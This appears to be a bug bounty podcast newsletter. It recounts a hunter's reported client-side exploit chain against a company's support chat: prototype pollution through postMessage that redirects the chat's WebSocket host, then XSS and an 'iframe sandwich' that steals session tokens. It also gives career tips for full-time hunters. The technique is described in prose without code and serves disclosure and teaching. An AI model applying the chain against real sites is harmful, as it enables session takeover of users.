Hacker TL;DR

• Map client-side message flow aggressively: enumerate postMessage sinks, then hunt for JSON.parse followed by Object.assign to force prototype pollution via string-gated branches. Many apps gate on typeof === "string" before parsing. Craft inputs that pass the gate, then flip config flags unreachable to scanners by exploring dead-code paths and lazy-loaded chunks.

• Abuse versioned config to hijack backends: if a version string resolves the WebSocket or API base URL, redirect to attacker-controlled infra.

• Succeeding in LHEs and as a full-time Hunter:

  • Optimize for MVH: target impact categories and bonus bug types the host company values.

  • Collab with people who have expertise in different areas to cover more ground.

  • Keep a tight routine: set fixed hacking blocks, schedule rest and study, and when focus drops, switch tasks instead of forcing it.

Stop chasing breaches and start fixing the gaps that cause them. ThreatLocker DAC automatically finds and helps you fix system misconfigurations before they're exploited. Effortlessly align with compliance standards like NIST, CIS, and HIPAA while hardening your defenses.

https://www.criticalthinkingpodcast.io/tl-dac

HACKERNOTES;

Bring a bug!

Before we even tell you who Busfactor is, let’s talk about a complex client-side heavy exploit chain from him (and he helped me write this “writeup” below,) let’s go!

A major, well-known company was using an in-house support chat, which immediately caught his attention, as building something so complex often introduces security flaws.

The chat ran in an iframe on the product page, communicating via postMessage. He discovered there were no origin checks and thought he had an easy win. But after days of digging through minified JavaScript, every lead turned into a dead end with no interesting bugs to show for it.

After taking a break, he returned to the chat and spotted a curious code pattern: a JSON.parse immediately followed by an Object.assign. This combination created a classic prototype pollution gadget. He couldn't find any useful functions or variables to poison at first, forcing him to dive deep into the code once more.

Hours into the hunt, he found a deeply nested config property. It was used during the iframe setup to define the hostname of the chat's WebSocket server. He could send a stringified JSON parameter, trigger the prototype pollution, and overwrite this property. He then set up a malicious WebSocket server and achieved XSS by faking an agent message containing his payload.

On its own, this XSS had no impact since it was on a separate origin, and the chat needed to connect to the legitimate server to access any sensitive data. To complete the attack, he used the "iframe sandwich" technique. He created a malicious page that opened both the chat URL (where his XSS would fire) and the main product page. Because his XSS-controlled window and the legitimate chat iframe shared the same origin, they could communicate. This allowed him to reach into the real iframe and steal the user's session token, achieving a full session takeover.

This bug was marked as critical because it affected all of the company's hundreds of products, meaning he could hijack a victim's session on any of them.

Shit, this was a roller coaster. hahahah

Who Busfactor is: before trying bug bounty, Vitor (Busfactor) was a software developer and then became an SRE, he got his first bounty around 14 months ago and 3 months ago he transiotioned to full-time bug bounty hunting. He have been hosting hackalongs for us in our Discord server if you’re interested in watching him hack and find those crazy exploit chains live.

What Busfactor means = the risk of keeping information from being shared inside of a company. He got his handle from an almost accident when he was almost hit by a bus while being the leader of an SRE team, and someone said “if you died right now it would have been a huge ‘bus factor’ for us” because a ton of valuable knowledge would be gone with him.

When he joined the HackTheBox team, they used their hacker handles as email so he chose busfactor, thinking that it could probably be changed in the future… But guess what, it just stuck.

Or maybe you’re 7urb0 and you don’t give a fuck about that

Google LHE in Mexico and Tips on Going Full-Time

Monke and Bus met at the LHE but they had already talked before in our Full Time Hunters’ exclusive chat on Discord, so they knew they could trust each other to hack together.

Most of this episode was about their recent LHE and the full-time bug bounty experience so I’ll make it shorter this time. Here are some takeaways and reasons why their duo performed so well + tips about going full-time on bug bounty:

• AI focused: even though they are both very proficient with client side stuff, Google has been focusing a lot on AI and everything around it is very new. It turned out great!

• Know what the host company values: Google typically awards their MVHs to whoever finds the most critical bug, not to who got the most money.

• If the hosting company is paying a bonus for a type of bug, maybe you should try focusing on that.

• If you’re thinking about going full time, have multiple plans in case it doesn’t go too well, being a full-time hunter requires a lot of dedication.

• Monke advises keeping bug bounty as a hobby for as long as you can. It’s the perfect hobby if you like to learn new stuff but when you don’t find a bug that’s not the end of the world. Get a ton of experience before thinking about going full-time.

• Busfactor treats bug bounty like a full-time job, with set times to hack, rest, exercise, and eat. This fixed routine helps him focus during work hours and disconnect during rest time.

• When Bus is tired, he switches to reading blog posts, studying topics he's interested in, or going to the gym. He believes forcing focus when his brain resists creates more stress and hurts his performance. Pushing too hard backfires, and bug bounty's freedom lets him "give up" and hit the gym or read, something office workers can't do.

• If you're not full-time yet, the boys advise being careful about how much time you spend working. You could end up working all day at your job and then all night as a bug hunter, knowing when to stop and go take care of your family or whatever other duties is important. When you hobby is paying your bills instead of only the beers, maybe it’s time to start thinking about the viability of making it your full-time thing.

If you want to check their blogs, I’ll link them below:

Monke.ie

VitorFalcao.com

JosephThacker.com

That’s it for the week,
and as always, keep hacking!